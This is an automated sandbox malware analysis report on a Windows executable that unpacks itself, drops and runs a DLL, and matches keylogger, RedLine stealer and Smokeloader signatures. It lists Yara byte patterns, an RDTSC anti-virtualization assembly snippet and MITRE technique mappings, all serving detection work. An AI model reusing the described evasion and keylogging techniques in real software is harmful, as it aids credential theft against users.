Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:756303
MD5:2479739c5d062ecb325147623241f007
SHA1:4394b6d2ca4ed82a5f2d70d10cd05cfa3b35ab2c
SHA256:728de9789af5f2ebc9ac2fac80fee25b186bc5b3acb960650934377f0c77726d
Tags:exe
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
AV process strings found (often used to terminate AV products)
Yara signature match
One or more processes crash
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Keylogger Generic
Uses Microsoft's Enhanced Cryptographic Provider
PE file contains executable resources (Code or Archives)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3548 cmdline: C:\Users\user\Desktop\file.exe MD5: 2479739C5D062ECB325147623241F007)
    • rundll32.exe (PID: 5248 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 668 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.260555630.0000000002AF0000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: file.exe PID: 3548JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: file.exeVirustotal: Detection: 38%Perma Link
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00878884 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00878884
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881940 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00881940
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087885C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,0_2_0087885C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008799FF CryptDestroyHash,0_2_008799FF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087A511 CryptReleaseContext,0_2_0087A511
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884967 CryptReleaseContext,0_2_00884967
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00883F6C CryptDestroyHash,0_2_00883F6C

    Compliance

    barindex
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: file.exe
    Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: file.exe
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D450 FindFirstFileW,FindClose,0_2_0040D450
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004235B0 FindFirstFileW,FindClose,0_2_004235B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040CE84
    Source: file.exe, 00000000.00000002.258207764.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: Yara matchFile source: Process Memory Space: file.exe PID: 3548, type: MEMORYSTR

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.260555630.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.260555630.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 668
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008819400_2_00881940
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008972440_2_00897244
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00885B340_2_00885B34
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008770C40_2_008770C4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BA8DC0_2_006BA8DC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008896220_2_00889622
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088C79C0_2_0088C79C
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040ACB4 appears 34 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A3C0 appears 76 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A0C0 appears 300 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040AEFC appears 33 times
    Source: file.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
    Source: file.exeVirustotal: Detection: 38%
    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_027667C6 CreateToolhelp32Snapshot,Module32First,0_2_027667C6
    Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-21267
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 668
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,startJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5248
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dllJump to behavior
    Source: classification engineClassification label: mal60.evad.winEXE@4/5@0/0
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: file.exeStatic file information: File size 3776000 > 1048576
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x386000
    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: file.exe
    Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: file.exe

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.didata:W;.edata:R;.tls:W;.rdata:R;.reloc:R;.rsrc:R;
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00422F40 push ecx; mov dword ptr [esp], ecx0_2_00422F44
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02767597 pushad ; iretd 0_2_02767598
    Source: Serpodtudpwhhta.dll.0.drStatic PE information: section name: .didata
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dllJump to dropped file
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085E760 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0085E760
    Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000042A6EB0 second address: 00000000042A778E instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-0Ch], edx 0x00000005 mov dword ptr [ebp-24h], 0000000Dh 0x0000000c mov eax, 00000001h 0x00000011 cmp eax, 00000000h 0x00000014 jnbe 00007F93209DD1A3h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 sub eax, dword ptr [ebp-04h] 0x0000001c cmp eax, dword ptr [ebp-24h] 0x0000001f jnl 00007F93209DD1AAh 0x00000021 inc dword ptr [ebp-14h] 0x00000024 jmp 00007F93209DD810h 0x00000029 mov eax, 00000000h 0x0000002e cmp eax, 00000000h 0x00000031 je 00007F93209DD1A3h 0x00000033 cmp dword ptr [ebp-14h], 02h 0x00000037 jng 00007F93209DD3DAh 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-21263
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D450 FindFirstFileW,FindClose,0_2_0040D450
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004235B0 FindFirstFileW,FindClose,0_2_004235B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040CE84
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_027660A3 push dword ptr fs:[00000030h]0_2_027660A3
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087C50C InitializeSecurityDescriptor,InitializeAcl,CreateWellKnownSid,CreateWellKnownSid,AddAccessAllowedAce,SetSecurityDescriptorDacl,0_2_0087C50C
    Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_0040D588
    Source: C:\Users\user\Desktop\file.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0040CA28
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: file.exe, 00000000.00000003.243980722.000000007F700000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.252501992.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000000.255187116.0000000003EC1000.00000020.00000001.01000000.00000004.sdmp, Serpodtudpwhhta.dll.0.drBinary or memory string: MSASCui.exe

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Command and Scripting Interpreter    		Path Interception1
    Process Injection    		1
    Virtualization/Sandbox Evasion    		1
    Input Capture    		12
    Security Software Discovery    		Remote Services1
    Input Capture    		Exfiltration Over Other Network Medium2
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts11
    Native API    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection    		LSASS Memory1
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Archive Collected Data    		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
    Obfuscated Files or Information    		NTDS1
    Remote System Discovery    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Rundll32    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Software Packing    		Cached Domain Credentials112
    System Information Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe39%VirustotalBrowse
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    World Map of Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:36.0.0 Rainbow Opal
    Analysis ID:756303
    Start date and time:2022-11-30 00:22:09 +01:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 8m 48s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:file.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:14
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal60.evad.winEXE@4/5@0/0
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 0.4% (good quality ratio 0.4%)
    • Quality average: 77.5%
    • Quality standard deviation: 0.5%
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for rundll32

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 20.189.173.21
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
    • Not all processes where analyzed, report is missing behavior information

    Simulations

    Behavior and APIs

    TimeTypeDescription
    00:23:18API Interceptor1x Sleep call for process: WerFault.exe modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c7d966c262eae458e8625727f886cf5c34890_82810a17_156d127b\Report.wer

    Download File
    Process:C:\Windows\SysWOW64\WerFault.exe
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):65536
    Entropy (8bit):0.9485641811025363
    Encrypted:false
    SSDEEP:192:p6lia0oXaHqqBIKjed+Mb/u7sqS274ItWc:0liMXyqqBIKjet/u7sqX4ItWc
    MD5:86B4D7D5A7632D224C45634319F9DDCF
    SHA1:4C72DCDB359F85A40C573C9F8B21E6D918E66635
    SHA-256:76A197B110567751607902657F4C8C73EAE08E9A5F40C3E6A5BDB4B56F6C8352
    SHA-512:9F842FC1D5724DB0F20F7C788A0E79991F1AEA19FCFC8322A379FF7BC6A562B828A5683B4F1CD68965EB0D74C27C0829EBEAD0AB8C35824E36E5014A6A17FE1A
    Malicious:false
    Reputation:low
    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.7.0.1.9.3.0.7.1.0.7.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.7.0.1.9.4.6.6.4.8.3.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.4.2.6.8.1.d.-.9.d.a.2.-.4.c.6.f.-.b.3.6.1.-.c.0.5.0.f.3.9.1.9.a.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.1.4.6.1.1.0.-.c.b.2.6.-.4.5.1.d.-.9.b.8.b.-.4.c.8.9.9.f.4.6.2.3.b.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.0.-.0.0.0.1.-.0.0.1.a.-.b.f.3.9.-.d.1.f.9.9.4.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AE.tmp.xml

    Download File
    Process:C:\Windows\SysWOW64\WerFault.exe
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):4640
    Entropy (8bit):4.463699038830804
    Encrypted:false
    SSDEEP:48:cvIwSD8zs7JgtWI9rjWgc8sqYj28fm8M4JCdsFIAaFov+q8/RgEAR4SrSz6d:uITfVISgrsqYnJvIuvE1MDWz6d
    MD5:CD2574D210A7A42D1B4B2DCA3FC3D1C1
    SHA1:02000F08ADFB84655075CFFB69B6A9CB52C2A03C
    SHA-256:BC8C2BE9F9D1DB01049430C046927F5450F9E24E957B336F22CBE5021436A9C3
    SHA-512:7C865D49D91C1BB8568FCAA5D6CC7150789E676358A38D86C937787EFF463765A80FFC72C4A2FF6D67C5819C7333C8376DDAB081789119D4A7527D6773049370
    Malicious:false
    Reputation:low
    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802493" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE8.tmp.WERInternalMetadata.xml

    Download File
    Process:C:\Windows\SysWOW64\WerFault.exe
    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):6306
    Entropy (8bit):3.713455556373279
    Encrypted:false
    SSDEEP:192:Rrl7r3GLNimP6ALa0ZDYTMSmGCprY89bxGKsfTUzcm:RrlsNiO6SaIDYTMSmbxGpfT6p
    MD5:BBBE86D86C59A9FFB64F22071FEDA7CA
    SHA1:09E81EF93A62EF6326ADF10B6E1B62BDC047B407
    SHA-256:199C6EA74D0B7C9B08E055E4E0B1B27BFEB213ECF41EF3473659F414199C92C8
    SHA-512:25CA4D998F69F01D0712C7C904545D27E748FECEFE260F84EEBD955562BB3D779F61E2A5CD6165E2A7358801CE319F1A281DF5FBEB96F719CE250E99AB46A13E
    Malicious:false
    Reputation:low
